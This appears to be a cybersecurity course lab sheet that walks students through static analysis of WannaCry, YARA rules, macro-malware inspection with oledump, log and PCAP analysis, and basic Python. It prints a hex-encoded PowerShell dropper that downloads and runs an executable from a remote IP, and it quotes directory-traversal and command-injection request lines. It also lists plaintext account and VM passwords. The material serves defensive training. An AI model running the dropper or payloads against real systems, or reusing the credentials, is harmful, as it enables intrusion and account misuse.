CySA 2021

#############
# CySA 2021 #
#############


                               ################################################
############################## # Day 1: Linux Fundamentals & Mawlare Analysis # ##############################
                               ################################################


Task 1: Linux Basics
--------------------
- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/


Slides we will cover
--------------------
- Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319


Task 2: More Linux Basics
-------------------------
site:	https://app.shellngn.com/
user:	joseph.mccray@gmail.com
pass:	P@ssw0rd123!@#123


NOTE: Ask me for the correct password


                               ###########################
############################## # Day 1: Malware Analysis # ##############################
                               ###########################


################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts). The fastest thing you can do is perform static analysis.


####################
# Malware Analysis #
####################


- After logging please open a terminal window and type the following commands:
---------------------------Type This-----------------------------------

cd ~/students/

mkdir yourname

cd yourname

mkdir malware_analysis

cd malware_analysis
-----------------------------------------------------------------------

- This is actual Malware (remember to run it in a VM - the password to extract it is 'infected':

---------------------------Type This-----------------------------------
cd ~/students/yourname/malware_analysis

cp ~/static_analysis/wannacry.exe .

file wannacry.exe

cp wannacry.exe malware.pdf

file malware.pdf

cp malware.pdf malware.exe

hexdump -n 2 -C malware.exe
-----------------------------------------------------------------------


***What is '4d 5a' or 'MZ'***
Open up a web browser and go to this reference link below. See if you can figure out what '4d 5a' or 'MZ'

Reference:
http://www.garykessler.net/library/file_sigs.html


---------------------------Type This-----------------------------------
cd ~/students/yourname/malware_analysis

objdump -x wannacry.exe | less
     q

strings wannacry.exe


strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i hkey

strings wannacry.exe | grep -i hku

strings wannacry.exe | grep -i crypto
---------------------------------------------------


################################
# Good references for WannaCry #
################################

References:

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html


####################################
# Tired of GREP - let's try Python #
####################################
Decided to make my own script for this kind of stuff in the future. I

Reference1:
https://infosecaddicts-files.s3.amazonaws.com/analyse_malware.py

This is a really good script for the basics of static analysis

Reference:
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html


This is really good for showing some good signatures to add to the Python script


Here is my own script using the signatures (started this yesterday, but still needs work):
https://pastebin.com/guxzCBmP


---------------------------Type This-----------------------------------
wget https://pastebin.com/raw/guxzCBmP


mv guxzCBmP am.py


nano am.py

python am.py wannacry.exe
-----------------------------------------------------------------------


##############
# Yara Ninja #
##############
Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomeware analysis"


Reference
https://www.mcafee.com/blogs/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/


- Yara Rule -


Strings:
$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
$s2 = “Wanna Decryptor” wide ascii nocase
$s3 = “.wcry” wide ascii nocase
$s4 = “WANNACRY” wide ascii nocase
$s5 = “WANACRY!” wide ascii nocase
$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase


Ok, let's look for the individual strings

---------------------------Type This-----------------------------------
cd ~/students/yourname/malware_analysis

strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry          **** Matches $s5, hmmm.....


-----------------------------------------------------------------------


Let's see if we can get yara working.
---------------------------Type This-----------------------------------
cd ~/students/yourname/malware_analysis

mkdir quick_yara

cd quick_yara

cp ~/static_analysis/wannacry.exe .
-----------------------------------------------------------------------


---------------------------Type This-----------------------------------

nano wannacry_1.yar

---------------------------Paste This-----------------------------------
rule wannacry_1 : ransom
{
   meta:
       author = "Joshua Cannell"
       description = "WannaCry Ransomware strings"
       weight = 100
       date = "2017-05-12"

   strings:
       $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
       $s2 = "Wanna Decryptor" wide ascii nocase
       $s3 = ".wcry" wide ascii nocase
       $s4 = "WANNACRY" wide ascii nocase
       $s5 = "WANACRY!" wide ascii nocase
       $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase

   condition:
       any of them
}

----------------------------------------------------------------------------


---------------------------Type This-----------------------------------

yara wannacry_1.yar wannacry.exe

-----------------------------------------------------------------------


---------------------------Type This-----------------------------------

nano wannacry_2.yar

---------------------------Paste This-----------------------------------
rule wannacry_2{
   meta:
       author = "Harold Ogden"
       description = "WannaCry Ransomware Strings"
       date = "2017-05-12"
       weight = 100

   strings:
       $string1 = "msg/m_bulgarian.wnry"
       $string2 = "msg/m_chinese (simplified).wnry"
       $string3 = "msg/m_chinese (traditional).wnry"
       $string4 = "msg/m_croatian.wnry"
       $string5 = "msg/m_czech.wnry"
       $string6 = "msg/m_danish.wnry"
       $string7 = "msg/m_dutch.wnry"
       $string8 = "msg/m_english.wnry"
       $string9 = "msg/m_filipino.wnry"
       $string10 = "msg/m_finnish.wnry"
       $string11 = "msg/m_french.wnry"
       $string12 = "msg/m_german.wnry"
       $string13 = "msg/m_greek.wnry"
       $string14 = "msg/m_indonesian.wnry"
       $string15 = "msg/m_italian.wnry"
       $string16 = "msg/m_japanese.wnry"
       $string17 = "msg/m_korean.wnry"
       $string18 = "msg/m_latvian.wnry"
       $string19 = "msg/m_norwegian.wnry"
       $string20 = "msg/m_polish.wnry"
       $string21 = "msg/m_portuguese.wnry"
       $string22 = "msg/m_romanian.wnry"
       $string23 = "msg/m_russian.wnry"
       $string24 = "msg/m_slovak.wnry"
       $string25 = "msg/m_spanish.wnry"
       $string26 = "msg/m_swedish.wnry"
       $string27 = "msg/m_turkish.wnry"
       $string28 = "msg/m_vietnamese.wnry"


   condition:
       any of ($string*)
}
----------------------------------------------------------------------------


---------------------------Type This-----------------------------------

yara wannacry_2.yar wannacry.exe

-----------------------------------------------------------------------


---------------------------Type This-----------------------------------
cd ~/students/yourname/malware_analysis/quick_yara

git clone https://github.com/Yara-Rules/rules.git

cd rules/

cd malware/

rm -rf RAT_PoetRATPython.yar

cd ..

./index_gen.sh

ls

cd malware/

ls | grep -i ransom

ls | grep -i rat

ls | grep -i toolkit

ls | grep -i apt

cd ..

cd capabilities/

ls

cat capabilities.yar

cd ..

cd cve_rules/

ls

cd ..

./index_gen.sh

cd ..

yara -w rules/index.yar wannacry.exe


----------------------------------------------------------------------


References:
https://www.slideshare.net/JohnLaycock1/yet-another-yara-allocution-yaya
https://www.slideshare.net/KasperskyLabGlobal/upping-the-apt-hunting-game-learn-the-best-yara-practices-from-kaspersky


#####################################################
# Analyzing Macro Embedded Malware                  #
#####################################################
---------------------------Type This-----------------------------------
cd ~/students/yourname/malware_analysis

mkdir macro_docs

cd macro_docs

cp -R ~/static_analysis/* .

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v
 -----------------------------------------------------------------------


- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A5 -v
-----------------------------------------------------------------------

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B

- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
-----------------------------------------------------------------------


#######################
# Log Analysis Basics #
#######################

Step 1: Download the log file
-----------------------------
Browse to this link below, and save the page as a text file on your desktop.
https://pastebin.com/raw/vhAh4XBQ


Step 2: Reduce the noise (Find/Replace All)
-------------------------------------------
Now open the log file in Notepad and perform basic find/replace actions. For each of snippets of text below do a replace all - replacing each one of them with nothing.
<189>Nov 11 2006
%Customer_PIX: Attacker_IP Accessed URL Target_IP:


-

Step 3: Group LIKE data
-----------------------
At the end of each one of these lines press ENTER 4 times.
15:59:32:  /icons/image2.gif
16:01:53:  /oz/attachments
16:03:53:  /oz/admin/control.php? tpl=Please+Select+a+Template+to+Edit+.+.+.&t=templates&restore_tpl=Restore+Templates
16:10:26:  /oz/common/logout.php?database=http://cgi.cs.kent.edu/ ~pwang/php/store/images/14.txt%00
16:27:20:  /oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../wordpress
16:28:27:  /wordpress/test.php?=PHPE9568F35-D428-11d2-A769- 00AA001ACF42


Step 4: Rename fields
----------------------
Find "../../../../../../../" (without the quotes) and replace it with "   --- directory traversal attack ---   "
Find "%20" (without the quotes) and replace it with " " (meaning a space also without the quotes)

Step 4: Repeat
--------------
Keep doing this process over and over and over


##############################################
# Log Analysis with Linux command-line tools #
##############################################
- The following command line executables are found in the Mac as well as most Linux Distributions.

cat –  prints the content of a file in the terminal window
grep – searches and filters based on patterns
awk –  can sort each row into fields and display only what is needed
sed –  performs find and replace functions
sort – arranges output in an order
uniq – compares adjacent lines and can report, filter or provide a count of duplicates


##############
# Cisco Logs #
##############
---------------------------Type This-----------------------------------
cd ~/students/yourname/
mkdir log_analysis
cd log_analysis
wget http://45.63.104.73/cisco.log
-----------------------------------------------------------------------


AWK Basics
----------
- To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
---------------------------Type This-----------------------------------
cat cisco.log | awk '{print $5}' | tail -n 4
-----------------------------------------------------------------------


- Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
---------------------------Type This-----------------------------------
cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
-----------------------------------------------------------------------


- While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
---------------------------Type This-----------------------------------
cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
-----------------------------------------------------------------------


- Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
---------------------------Type This-----------------------------------
cat cisco.log | grep %LINEPROTO-5-UPDOWN:

cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn

cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn

cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
-----------------------------------------------------------------------


###############
# Apache Logs #
###############

Reference:
http://www.the-art-of-web.com/system/logs/

---------------------------Type This-----------------------------------
cd ~/students/yourname/log_analysis

cp /home/ocodco/students/j0e/log_analysis/access_log .
-----------------------------------------------------------------------

You want to list all user agents ordered by the number of times they appear (descending order):
---------------------------Type This-----------------------------------
awk -F\" '{print $6}' access_log | sort | uniq -c | sort -rn
-----------------------------------------------------------------------


Using the default separator which is any white-space (spaces or tabs) we get the following:
NOTE: Do not run the part after the "#" symbol - that is just for explanation
---------------------------Type This-----------------------------------
awk '{print $1}' access_log         # ip address (%h)
awk '{print $2}' access_log         # RFC 1413 identity (%l)
awk '{print $3}' access_log         # userid (%u)
awk '{print $4,5}' access_log       # date/time (%t)
awk '{print $9}' access_log         # status code (%>s)
awk '{print $10}' access_log        # size (%b)
-----------------------------------------------------------------------

You might notice that we've missed out some items. To get to them we need to set the delimiter to the " character which changes the way the lines are 'exploded' and allows the following:
---------------------------Type This-----------------------------------
awk -F\" '{print $2}' access_log    # request line (%r)
awk -F\" '{print $4}' access_log    # referer
awk -F\" '{print $6}' access_log    # user agent
-----------------------------------------------------------------------


Reference:
https://blog.nexcess.net/2011/01/21/one-liners-for-apache-log-files/

# top 20 URLs from the last 5000 hits
---------------------------Type This-----------------------------------
tail -5000 ./access_log | awk '{print $7}' | sort | uniq -c | sort -rn | head -20
tail -5000 ./access_log | awk '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
-----------------------------------------------------------------------

# top 20 URLS excluding POST data from the last 5000 hits
---------------------------Type This-----------------------------------
tail -5000 ./access_log | awk -F"[ ?]" '{print $7}' | sort | uniq -c | sort -rn | head -20
tail -5000 ./access_log | awk -F"[ ?]" '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
-----------------------------------------------------------------------

# top 20 IPs from the last 5000 hits
---------------------------Type This-----------------------------------
tail -5000 ./access_log | awk '{print $1}' | sort | uniq -c | sort -rn | head -20
tail -5000 ./access_log | awk '{freq[$1]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
-----------------------------------------------------------------------

# top 20 URLs requested from a certain ip from the last 5000 hits
---------------------------Type This-----------------------------------
IP=1.2.3.4; tail -5000 ./access_log | grep $IP | awk '{print $7}' | sort | uniq -c | sort -rn | head -20
IP=1.2.3.4; tail -5000 ./access_log | awk -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
-----------------------------------------------------------------------


# top 20 URLS requested from a certain ip excluding, excluding POST data, from the last 5000 hits
---------------------------Type This-----------------------------------
IP=1.2.3.4; tail -5000 ./access_log | fgrep $IP | awk -F "[ ?]" '{print $7}' | sort | uniq -c | sort -rn | head -20
IP=1.2.3.4; tail -5000 ./access_log | awk -F"[ ?]" -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
-----------------------------------------------------------------------


# top 20 referrers from the last 5000 hits
---------------------------Type This-----------------------------------
tail -5000 ./access_log | awk '{print $11}' | tr -d '"' | sort | uniq -c | sort -rn | head -20
tail -5000 ./access_log | awk '{freq[$11]++} END {for (x in freq) {print freq[x], x}}' | tr -d '"' | sort -rn | head -20
-----------------------------------------------------------------------


# top 20 user agents from the last 5000 hits
---------------------------Type This-----------------------------------
tail -5000 ./access_log | cut -d\  -f12- | sort | uniq -c | sort -rn | head -20
-----------------------------------------------------------------------


# sum of data (in MB) transferred in the last 5000 hits
---------------------------Type This-----------------------------------
tail -5000 ./access_log | awk '{sum+=$10} END {print sum/1048576}'
-----------------------------------------------------------------------


#################################
# Using Python for log analysis #
#################################

python

>>>


###########################################
# Python Basics Lesson 1: Simple Printing #
###########################################

>>> print 1

>>> print hello

>>> print "hello"

>>> print "Today we are learning Python."


###################################################
# Python Basics Lesson 2: Simple Numbers and Math #
###################################################

>>> 2+2

>>> 6-3

>>> 18/7

>>> 18.0/7

>>> 18.0/7.0

>>> 18/7

>>> 9%4

>>> 8%4

>>> 8.75%.5

>>> 6.*7

>>> 6*6*6

>>> 6**3

>>> 5**12

>>> -5**4


#####################################
# Python Basics Lesson 3: Variables #
#####################################

>>> x=18

>>> x+15

>>> x**3

>>> y=54

>>> x+y

>>> age=input("Enter number here: ")
        43

>>> age+32

>>> age**3

>>> fname = raw_input("Enter your first name: ")

>>> lname = raw_input("Enter your first name: ")

>>> fname = raw_input("Enter your name: ")
Enter your name: Joe

>>> lname = raw_input("Enter your name: ")
Enter your name: McCray

>>> print fname
Joe

>>> print lname
McCray

>>> print fname lname

>>> print fname+lname
JoeMcCray


NOTE:
Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.


#################################################
# Python Basics Lesson 4: Modules and Functions #
#################################################

>>> 5**4

>>> pow(5,4)

>>> abs(-18)

>>> abs(5)

>>> floor(18.7)

>>> import math

>>> math.floor(18.7)

>>> math.sqrt(81)

>>> joe = math.sqrt

>>> joe(9)

>>> joe=math.floor

>>> joe(19.8)


###################################
# Python Basics Lesson 5: Strings #
###################################

>>> "XSS"

>>> 'SQLi'

>>> "Joe's a python lover"

>>> 'Joe\'s a python lover'

>>> "Joe said \"InfoSec is fun\" to me"

>>> a = "Joe"

>>> b = "McCray"

>>> a, b

>>> a+b


########################################
# Python Basics Lesson 6: More Strings #
########################################

>>> num = 10

>>> num + 2

>>> "The number of open ports found on this system is " + num

>>> num = str(18)

>>> "There are " + num + " vulnerabilities found in this environment."

>>> num2 = 46

>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`


NOTE:
Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.


###############################################
# Python Basics Lesson 7: Sequences and Lists #
###############################################

>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks
['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks[3]
'SQL Injection'

>>> attacks[-2]
'Cross-Site Scripting'


########################################
# Python Basics Level 8: If Statement #
########################################
>>> attack="SQLI"
>>> if attack=="SQLI":
        print 'The attacker is using SQLI'

>>> attack="XSS"
>>> if attack=="SQLI":
        print 'The attacker is using SQLI'


>>> exit()

#############################
# Reference Videos To Watch #
#############################
Here is your first set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)


#####################################
# Lesson 9: Intro to Log Analysis #
#####################################

Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
        username: strategicsec
        password: strategicsec

Then execute the following commands:
---------------------------------------------------------------------------------------------------------


wget https://s3.amazonaws.com/SecureNinja/Python/access_log


cat access_log | grep 141.101.80.188

cat access_log | grep 141.101.80.187

cat access_log | grep 108.162.216.204

cat access_log | grep 173.245.53.160

---------------------------------------------------------

Google the following terms:
        - Python read file
        - Python read line
        - Python read from file


########################################################
# Lesson 10: Use Python to read in a file line by line #
########################################################


Reference:
http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/


Let's have some fun.....


>>> f = open('access_log', "r")

>>> lines = f.readlines()

>>> print lines

>>> lines[0]

>>> lines[10]

>>> lines[50]

>>> lines[1000]

>>> lines[5000]

>>> lines[10000]

>>> print len(lines)


---------------------------------------------------------
vi logread1.py


## Open the file with read only permit
f = open('access_log', "r")

## use readlines to read all lines in the file
## The variable "lines" is a list containing all lines
lines = f.readlines()

print lines


## close the file after reading the lines.
f.close()

---------------------------------------------------------


Google the following:
        - python difference between readlines and readline
        - python readlines and readline


#################################
# Lesson 11: A quick challenge #
#################################

Can you write an if/then statement that looks for this IP and print "Found it"?


141.101.81.187


---------------------------------------------------------
Hint 1: Use Python to look for a value in a list

Reference:
http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html


---------------------------------------------------------
Hint 2: Use Python to prompt for user input

Reference:
http://www.cyberciti.biz/faq/python-raw_input-examples/


---------------------------------------------------------
Hint 3: Use Python to search for a string in a list

Reference:
http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string


Here is my solution:
-------------------
$ python
>>> f = open('access_log', "r")
>>> lines = f.readlines()
>>> ip = '141.101.81.187'
>>> for string in lines:
...     if ip in string:
...             print(string)


Here is one student's solution - can you please explain each line of this code to me?
-------------------------------------------------------------------------------------
#!/usr/bin/python

f = open('access_log')

strUsrinput = raw_input("Enter IP Address: ")

for line in iter(f):
    ip = line.split(" - ")[0]
    if ip == strUsrinput:
        print line

f.close()


-------------------------------

Working with another student after class we came up with another solution:

#!/usr/bin/env python


# This line opens the log file
f=open('access_log',"r")

# This line takes each line in the log file and stores it as an element in the list
lines = f.readlines()


# This lines stores the IP that the user types as a var called userinput
userinput = raw_input("Enter the IP you want to search for: ")


# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
for ip in lines:
    if ip.find(userinput) != -1:
        print ip


#########################################
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 1            #
#########################################
Required Technical Skills:      Comfortable with basic Linux/Windows (MCSA/Linux+)
                                Comfortable with basic network (Network+)
                                Comfortable with security fundamentals (Security+)


Job Task:                       Process security events, follow incident response triage playbook

#########################################
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 2            #
#########################################

Required Technical Skills:      Comfortable with basic Linux/Windows system administration
                                Comfortable with basic network administration
                                Comfortable with basic programming
                                Comfortable researching IT security issues


Job Task:                       Perform detailed malware analysis, assist with development of the incident response triage playbook

Sample Playbook:                https://infosecaddicts-files.s3.amazonaws.com/IR-Program-and-Playbooks.zip


#########################################
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 3            #
#########################################

Required Technical Skills:      Strong statistical analysis background
                                Strong programming background (C, C++, Java, Assembly, scripting languages)
                                Advanced system/network administration background
                                Comfortable researching IT security issues


Job Task:                       Perform detailed malware analysis
                                Perform detailed statistical analysis
                                Assist with development of the incident response triage playbook


#################################################
# Good references for learning Malware Analysis #
#################################################

References:
https://www.slideshare.net/SamBowne/cnit-126-ch-0-malware-analysis-primer-1-basic-static-techniques
https://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-bsideslv-on-august-5-2014
https://www.slideshare.net/Bletchley131/intro-to-static-analysis


                               #####################################
############################## # Day 2: Threat Hunting on the wire # ##############################
                               #####################################


- After logging please open a terminal window and type the following commands:
---------------------------Type This-----------------------------------

cd ~/students/yourname/

mkdir pcap_analysis

cd ~/students/yourname/pcap_analysis
-----------------------------------------------------------------------


##################################################################
# Analyzing a PCAP Prads                                         #
# Note: run as regular user                                      #
##################################################################

---------------------------Type this as a regular user----------------------------------


cd ~/students/yourname/pcap_analysis/

mkdir prads/

cd prads/

cp -R /home/ocodco/pcap_analysis/chaos_reader/*pcap .

prads -r suspicious-time.pcap -l prads-asset.log

cat prads-asset.log | less
     q

cat prads-asset.log | grep SYN | grep -iE 'windows|linux'

cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'

cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
-----------------------------------------------------------------------


##################################
# PCAP Analysis with ChaosReader #
# Note: run as regular user      #
##################################
---------------------------Type this as a regular user----------------------------------
cd ~/students/yourname/pcap_analysis/

mkdir chaos_reader/

cd chaos_reader/

wget http://45.63.104.73/suspicious-time.pcap

wget http://45.63.104.73/chaosreader.pl

perl chaosreader.pl suspicious-time.pcap

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr


for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u


for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' |  cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' |  cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host";  done | sort -u | awk '{print $5}' > url.lst


wget https://raw.githubusercontent.com/Open-Sec/forensics-scripts/master/check-urls-virustotal.py


python check-urls-virustotal.py url.lst


------------------------------------------------------------------------


#############################
# PCAP Analysis with tshark #
# Note: run as regular user #
#############################
---------------------------Type this as a regular user---------------------------------
cd ~/students/yourname/pcap_analysis/

mkdir tshark/

cd tshark/

cp -R /home/ocodco/pcap_analysis/chaos_reader/*pcap .

tshark -i ens3 -r suspicious-time.pcap -qz io,phs

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq

tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"


tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'

whois rapidshare.com.eyu32.ru

whois sploitme.com.cn

tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -Y http.request  -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico'  | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
------------------------------------------------------------------------


###############################
# Extracting files from PCAPs #
# Note: run as regular user   #
###############################
---------------------------Type this as a regular user---------------------------------
cd ~/students/yourname/pcap_analysis/

mkdir extract_files

cd extract_files

wget http://45.63.104.73/suspicious-time.pcap

foremost -v -i suspicious-time.pcap

cd output

ls

cat audit.txt

cd exe

wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py
---------------------------------------------------------------------------------------


******* NOTE: You will need to put your virustotal API key in vtlite.py *******
* Create an account in virustotal > login > click on your profile > API key > copy API key > in terminal do nano vtlite.py >
* Paste the API key in where it says > profit
********************************************************************************

---------------------------Type this as a regular user---------------------------------
for f in *.exe; do python3 vtlite.py -s $f; sleep 20; done
---------------------------------------------------------------------------------------